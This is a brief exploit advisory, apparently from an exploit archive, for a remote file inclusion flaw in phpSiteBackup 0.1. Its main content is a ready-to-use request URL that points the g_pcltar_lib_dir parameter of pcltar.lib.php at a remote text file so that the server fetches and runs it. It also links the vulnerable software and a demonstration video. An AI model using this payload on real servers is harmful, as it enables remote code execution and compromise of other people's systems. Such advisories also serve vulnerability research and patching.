id: 1979
date: 06/25/2007
title: phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

======================================================================
phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion Vulnerability
======================================================================



# phpSiteBackup 0.1 (pcltar.lib.php) Remote File Include Vulnerability

# D.Script:
          
http://kent.dl.sourceforge.net/sourceforge/phpsitebackup/phpSiteBackup-0.1.tgz

# Exploit:
          
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=http://localhost/tryag.txt?

# D.Vidoe:
          http://my-story.org/uploads/phpSiteBackup.rar

# Discovered by:
          GoLd_M = [Mahmood_ali]




#  0day.today [2023-03-21]  #